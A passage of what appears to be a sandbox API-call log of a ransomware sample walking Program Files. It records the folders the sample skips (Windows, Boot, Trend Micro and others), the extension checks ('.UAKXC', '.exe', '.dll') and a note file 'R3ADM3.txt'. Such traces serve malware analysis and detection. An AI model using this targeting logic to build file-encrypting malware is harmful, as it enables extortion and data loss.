dwFlags=0x0, lpMem=0xed3a78 | out: hHeap=0xea0000) returned 1 [0136.925] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x734f7d60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x734f7d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0136.925] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0136.925] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0136.925] StrStrIW (lpFirst="Java", lpSrch="tmp") returned 0x0 [0136.925] StrStrIW (lpFirst="Java", lpSrch="winnt") returned 0x0 [0136.925] StrStrIW (lpFirst="Java", lpSrch="temp") returned 0x0 [0136.925] StrStrIW (lpFirst="Java", lpSrch="thumb") returned 0x0 [0136.925] StrStrIW (lpFirst="Java", lpSrch="$Recycle.Bin") returned 0x0 [0136.925] StrStrIW (lpFirst="Java", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.925] StrStrIW (lpFirst="Java", lpSrch="System Volume Information") returned 0x0 [0136.925] StrStrIW (lpFirst="Java", lpSrch="Boot") returned 0x0 [0136.925] StrStrIW (lpFirst="Java", lpSrch="Windows") returned 0x0 [0136.926] StrStrIW (lpFirst="Java", lpSrch="Trend Micro") returned 0x0 [0136.926] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.926] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.926] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0136.926] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.926] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.926] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6bc8 [0136.926] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0136.926] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0136.926] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdc5516a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5516a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0136.926] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0136.926] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="tmp") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="winnt") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="temp") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="thumb") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="$Recycle.Bin") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="System Volume Information") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="Boot") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="Windows") returned 0x0 [0136.926] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="Trend Micro") returned 0x0 [0136.926] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcd20 [0136.926] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.927] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.927] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xed3a78 [0136.927] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.927] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.927] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcd20 | out: hHeap=0xea0000) returned 1 [0136.927] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6bf0 [0136.927] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xed8dd8 [0136.927] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3a78 | out: hHeap=0xea0000) returned 1 [0136.927] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef0a44f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0136.927] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0136.927] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="tmp") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="winnt") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="temp") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="thumb") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="$Recycle.Bin") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="System Volume Information") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="Boot") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="Windows") returned 0x0 [0136.927] StrStrIW (lpFirst="Microsoft Office", lpSrch="Trend Micro") returned 0x0 [0136.927] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.927] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.927] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.928] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.928] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.928] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.928] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.928] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c18 [0136.928] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0136.928] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.928] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdc60fd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc60fd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Visual Studio 8", cAlternateFileName="MICROS~3")) returned 1 [0136.928] lstrcmpW (lpString1="Microsoft Visual Studio 8", lpString2=".") returned 1 [0136.928] lstrcmpW (lpString1="Microsoft Visual Studio 8", lpString2="..") returned 1 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="tmp") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="winnt") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="temp") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="thumb") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="$Recycle.Bin") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="System Volume Information") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="Boot") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="Windows") returned 0x0 [0136.928] StrStrIW (lpFirst="Microsoft Visual Studio 8", lpSrch="Trend Micro") returned 0x0 [0136.928] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcd20 [0136.928] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.928] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.928] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xed3a78 [0136.928] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.928] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.929] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcd20 | out: hHeap=0xea0000) returned 1 [0136.929] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c40 [0136.929] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xed8e50 [0136.929] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3a78 | out: hHeap=0xea0000) returned 1 [0136.929] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0136.929] lstrcmpW (lpString1="Microsoft.NET", lpString2=".") returned 1 [0136.929] lstrcmpW (lpString1="Microsoft.NET", lpString2="..") returned 1 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="tmp") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="winnt") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="temp") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="thumb") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="$Recycle.Bin") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="System Volume Information") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="Boot") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="Windows") returned 0x0 [0136.929] StrStrIW (lpFirst="Microsoft.NET", lpSrch="Trend Micro") returned 0x0 [0136.929] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0136.929] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.929] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.929] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.929] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.929] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.929] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0136.929] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0136.929] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0136.930] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.930] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xdc492fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc492fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0136.930] lstrcmpW (lpString1="Mozilla Firefox", lpString2=".") returned 1 [0136.930] lstrcmpW (lpString1="Mozilla Firefox", lpString2="..") returned 1 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="tmp") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="winnt") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="temp") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="thumb") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="$Recycle.Bin") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="System Volume Information") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="Boot") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="Windows") returned 0x0 [0136.930] StrStrIW (lpFirst="Mozilla Firefox", lpSrch="Trend Micro") returned 0x0 [0136.930] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c90 [0136.930] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.930] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.930] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.930] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.930] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.930] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c90 | out: hHeap=0xea0000) returned 1 [0136.930] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c90 [0136.930] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b00 [0136.930] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.931] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xdc60fd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc60fd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0136.931] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2=".") returned 1 [0136.931] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2="..") returned 1 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="tmp") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="winnt") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="temp") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="thumb") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="$Recycle.Bin") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="System Volume Information") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="Boot") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="Windows") returned 0x0 [0136.931] StrStrIW (lpFirst="Mozilla Maintenance Service", lpSrch="Trend Micro") returned 0x0 [0136.931] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcd20 [0136.931] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.931] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.931] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xed3a78 [0136.931] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.931] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.931] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcd20 | out: hHeap=0xea0000) returned 1 [0136.931] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6cb8 [0136.931] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeda9d8 [0136.931] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3a78 | out: hHeap=0xea0000) returned 1 [0136.931] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdd373940, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdd373940, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0136.932] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0136.932] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="tmp") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="winnt") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="temp") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="thumb") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="$Recycle.Bin") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="System Volume Information") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="Boot") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="Windows") returned 0x0 [0136.932] StrStrIW (lpFirst="MSBuild", lpSrch="Trend Micro") returned 0x0 [0136.932] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.932] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.932] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0136.932] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.932] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.932] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6ce0 [0136.932] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcd20 [0136.932] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0136.932] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x575152b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x575152b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x575152b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0136.932] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0136.932] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0136.932] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0136.932] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0136.933] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0136.933] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0136.933] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0136.933] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0136.933] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0136.933] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0136.933] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0136.933] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="tmp") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="winnt") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="temp") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="thumb") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="$Recycle.Bin") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="System Volume Information") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="Boot") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="Windows") returned 0x0 [0136.933] StrStrIW (lpFirst="Reference Assemblies", lpSrch="Trend Micro") returned 0x0 [0136.933] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.933] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.933] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.933] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed8ec8 [0136.933] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.933] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.934] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.934] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d08 [0136.934] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3a78 [0136.934] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8ec8 | out: hHeap=0xea0000) returned 1 [0136.934] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xdc5e9c20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5e9c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0136.934] lstrcmpW (lpString1="Uninstall Information", lpString2=".") returned 1 [0136.934] lstrcmpW (lpString1="Uninstall Information", lpString2="..") returned 1 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="tmp") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="winnt") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="temp") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="thumb") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="$Recycle.Bin") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="System Volume Information") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="Boot") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="Windows") returned 0x0 [0136.934] StrStrIW (lpFirst="Uninstall Information", lpSrch="Trend Micro") returned 0x0 [0136.934] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.934] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.934] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.934] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed8ec8 [0136.934] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.934] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.934] HeapFree (in: 